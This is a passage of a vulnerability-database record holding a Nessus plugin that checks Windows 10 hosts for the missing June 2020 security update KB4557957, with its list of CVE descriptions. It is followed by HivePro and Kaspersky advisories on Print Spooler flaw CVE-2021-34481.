script_id(137304);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1120\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1284\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4557957\");\n script_xref(name:\"MSFT\", value:\"MS20-4557957\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4557957: Windows 10 Version 2004 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4557957/windows-10-update-kb4557957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4706967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4557957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4557957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"06_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4557957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202126.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAfter almost 10 days of releasing [an advisory ](<https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/>)by the Hive Pro Threat Research team, a new vulnerability has been found in Windows Print Spooler. This is a privilege escalation flaw that allows attackers to run arbitrary code with SYSTEM privileges, giving them the ability to install programs, read, alter, or remove data, and create new accounts with full user rights. The affected versions have not been known as of now. There have been no patches released yet, but workarounds are available.\n\n#### Vulnerability Details\n\n**CVE ID** | **Affected CPEs** | **Vulnerability Name** \n---|---|--- \nCVE-2021-34481 | cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:* | Microsoft windows print spooler service Privilege Escalation \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>\n\n#### References\n\n<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>\n\n<https://arstechnica.com/gadgets/2021/07/disable-the-windows-print-spooler-to-prevent-hacks-microsoft-tells-customers/>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-18T13:12:53", "type": "hivepro", "title": "Weren\u2019t you warned about reactivating the Print Spooler?", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-18T13:12:53", "id": "HIVEPRO:1C413EFAC97AED19F9E35574668008F9", "href": "https://www.hivepro.com/werent-you-warned-about-reactivating-the-print-spooler/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-05-23T16:31:04", "description": "### *Detect date*:\n07/15/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Products (Extended Support Update). Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2016 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows RT 8.1 \nWindows 10 Version 2004 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34481](<https://nvd.nist.gov/vuln/detail/CVE-2021-34481>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-34481](<https://vulners.com/cve/CVE-2021-34481>)4.6Warning", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-15T00:00:00", "type": "kaspersky", "title": "KLA12246 PE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-08-04T00:00:00", "id": "KLA12246", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12246/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:31:13", "description": "### *Detect date*:\n07/15/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Versions Under Investigation\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the 